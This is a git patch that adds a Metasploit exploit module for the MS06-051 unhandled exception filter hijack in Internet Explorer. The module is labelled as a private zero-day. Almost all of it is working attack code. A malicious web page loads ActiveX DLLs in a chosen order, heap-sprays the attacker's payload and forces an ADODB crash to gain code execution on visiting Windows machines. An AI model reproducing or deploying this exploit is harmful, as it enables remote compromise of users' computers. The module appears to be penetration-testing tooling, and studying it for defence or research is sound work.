From 86c400a8bd5d9d5ebf17093ca81dad2c8fac3426 Mon Sep 17 00:00:00 2001
From: Matt Miller <mmiller@hick.org>
Date: Tue, 8 Aug 2006 18:39:49 +0000
Subject: [PATCH] sup

git-svn-id: file:///home/svn/framework3/trunk@3809 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../private/ms06_051_unexceptfilter.rb        | 191 ++++++++++++++++++
 1 file changed, 191 insertions(+)
 create mode 100644 modules/exploits/private/ms06_051_unexceptfilter.rb

diff --git a/modules/exploits/private/ms06_051_unexceptfilter.rb b/modules/exploits/private/ms06_051_unexceptfilter.rb
new file mode 100644
index 0000000000..3a6dda6f7c
--- /dev/null
+++ b/modules/exploits/private/ms06_051_unexceptfilter.rb
@@ -0,0 +1,191 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Private::IeUnexpFilt < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::Html
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'MS06-051 Unhandled Exception Filter Hijack',
+			'Description'    => %q{
+				This module exploits a design error in the way that the unhandled
+				exception filter chain is managed.  By loading and unloading DLLs
+				that register UEFs in the proper order, it is possible to cause
+				the top-level unhandled exception filter to point to an invalid
+				memory address.  Using heap spraying techniques, it is possible
+				to place attacker controlled code at the location that the top-level
+				unhandled exception filter points.  Generating an unhandled 
+				exception then leads to code execution.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'skape', 
+				],
+			'Version'        => '$Revision: 1.0 $',
+			'References'     => 
+				[
+					# 0day
+				],
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'MaxNops'  => 0
+				},
+			'Targets'        =>
+				[
+					# Target 0: Automatic
+					[
+						'Windows NT/2000/XP/2003 Automatic',
+						{
+							'Platform' => 'win',
+						},
+					],
+				],
+			'DefaultTarget'  => 0))
+	end
+
+	def on_request_uri(cli, request)
+		p = payload
+
+		# Re-generate the payload
+		return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)
+
+		hex     = p.encoded.unpack('H*')[0]
+		content = 
+		"<html><script language='javascript'>
+			var w1;
+			var w2;
+
+			function win1()
+			{
+				// GBDetect is small, so we have to take steps to make sure 
+				// that the heap grows into the region.  Therefore, we need
+				// to load DLLs that will be loaded at lower addresses.
+			
+				// This series works reliably, but relies on vmware:
+				//new ActiveXObject('vmappcfg.ProjWz.9');
+				//new ActiveXObject('GBDetect.Detect');
+				//new ActiveXObject('vmhwcfg.Hwz.9');
+				
+				// This series works reliably
+				//new ActiveXObject('OPUCatalog.OPUCatalog11'); // office
+				//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+				//new ActiveXObject('NvCpl.NvCplLateBound'); // nvidia
+				//new ActiveXObject('BarControl.GDSControl'); // realplayer
+
+				// works all by itself, just need to spray better
+				//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+
+				// these may be useful...
+				//new ActiveXObject('CDDBRealControl.CDDBControl');//realplayer
+				//new ActiveXObject('CEnroll.CEnroll');
+
+				// These overlap on XPSP2, not on XPSP0.  msado15 is larger
+				new ActiveXObject('RDS.DataControl'); // msadco
+				new ActiveXObject('ADODB.Record'); // msado15
+
+				// Acrobat OCX
+				new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+				
+				window.opener.open2();
+			}
+
+			function win2()
+			{
+				// Some random real player activex control that sets an unhandled
+				// exception filter indirectly through another DLL.
+				//new ActiveXObject('IERJCtl.IERJCtl');
+
+				// Even though an object instance isn't created as a result of this, 
+				// the DLL associated with this COM object is still loaded, causing
+				// it to register its UEF.
+				try
+				{
+					new ActiveXObject('CompatUI.Util');
+				} catch(err)
+				{
+				}
+
+				window.opener.go();
+			}
+
+			function crash()
+			{
+				var sp1 = spray(0);
+
+				// IE crash bug #134234
+				a = new ActiveXObject('ADODB.Recordset');
+				try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
+				try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
+				try { a.Filter = 0x7ffffffe; } catch(e) { }
+			}
+
+			function spray(length)
+			{
+				var payloadHex = \"#{hex}\";
+				var payload    = unescape(payloadHex.replace(/([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})/g, \"%u$2$1\"));
+
+				CollectGarbage();
+
+				var spray = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');
+
+				if (length == 0)
+					length = 0x4000000;
+
+				do 
+				{
+					if (spray.length >= 0x10000)
+						spray += payload;
+					spray += spray;
+				} while (spray.length < length);
+
+				spray += payload;
+			}
+
+			function close2()
+			{
+				w2.close();
+				setTimeout('crash();', 1000);
+			}
+
+			function close1()
+			{
+				w1.close();
+				setTimeout('close2();', 1000);
+			}
+
+			function go()
+			{
+				setTimeout('close1();', 1000);
+			}
+
+			function open2()
+			{
+				w2 = window.open('#{request.resource}?window=1', 'win2');
+			}
+
+			if (window.opener == null)
+			{
+				spray(0x100000);
+
+				w1 = window.open('#{request.resource}?window=1', 'win1');
+			}
+			else
+			{ 
+				if (window.name == 'win1')
+					win1();
+				else
+					win2();
+			}
+			</script></html>";
+
+		# Transmit the response to the client
+		send_response(cli, content)
+	end
+
+end
+
+end